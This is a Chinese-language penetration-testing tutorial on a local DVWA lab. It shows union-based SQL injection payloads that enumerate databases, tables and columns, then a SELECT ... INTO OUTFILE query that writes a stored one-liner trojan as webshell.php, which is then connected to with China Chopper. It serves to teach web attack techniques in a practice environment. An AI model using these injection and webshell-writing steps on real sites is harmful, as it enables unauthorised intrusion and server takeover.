在渗透测试中,希望通过MySQL获取webshell需要满足以下几个条件:
1、对web目录有写权限
2、GPC关闭(是否对单引号进行转义)
3、知道服务器的绝对路径
4、secure-file-priv为打开的状态
至少要满足以上4个条件,才能顺利通过MySQL获取webshell
接下来,为了能够模拟出渗透这一个过程,使用dvwa靶场来进行模拟(当然相比于真正的时间,中间会省略很多过程)
首先打开dvwa靶场,他是搭建在本地的靶场,数据库和代码均保存在本地服务器中。这里我使用的是phpstudy集成环境,使用navicat作为数据库的视图工具
当然在实战过程中是不知道这些信息的,这里只是提前做一个演示
为了方便起见,就将安全级别设置为low,方便爆库。
首先判断是否存在注入点,输入1点击查询能查询出结果;输入 ' 发生报错说明这里存在注入点
输入
' or ' ' = '
对SQL语句进行拼接(这里不做过多解释,SQL注入详见:初识SQL注入,初识SQL盲注),爆出Firstname和Surname的所有信息。猜测字段数为2,使用order by,输入
1' order by 2 #
说明存在两个字段,再使用联合查询,输入
1' union select 1,2 #
所以我们知道字段1内容会显示在1的位置,字段2内容会显示在2的位置。那么可以通过SQL注入的方法来注出一些有用的信息
爆库名及版本信息
1' union select database(),version() #
爆当前用户
1' union select 1,user() #
爆所有数据库名
1' union select 1,schema_name from information_schema.schemata #
爆其中一个数据库dvwa的表名
1' union select 1,table_name from information_schema.tables where table_schema=database() #
爆users表的字段
1' union select 1,column_name from information_schema.columns where table_name = 'users' #
获取webshell,首先要知道目录(这里不展示目录了),可以使用语句
1' union select 1,@@datadir#
为了获取webshell,还需要数据库开启secure_file_priv,这个需要手动配置(当然在实战中需要数据库已经开启secure_file_priv,这里为了效果就手动开)。找到数据库安装目录下的my.ini,添加
secure_file_priv=
ctrl+s保存,然后重启MySQL(一定要记得重启)
在数据库命令行中输入
show variables like '%secure%';
若如上图所示为空则表示已经开启,如果为NULL说明MySQL没有重启。
还需要满足对表有插入的权限,在实战中这里涉及到提权,将权限提升至root,这里无法演示就直接在数据库插入一句话木马
然后进行导出的操作,输入
SELECT avatar FROM users WHERE user_id='6' into outfile "G:\php\phpstudy\PHPTutorial\WWW\webshell.php";
查看服务器下已经有webshell这个文件
现在使用菜刀连接
成功获取webshell,可以进行任意操作
成功通过MySQL获取webshell。
实战中情况会复杂很多,这里只做简单的演示。总的来说就是先将一句话木马存至数据库中,再将这个字段导出为PHP文件至服务器目录下,通过菜刀连接。至于数据库的信息和权限需要分别通过爆库和提权来实现。
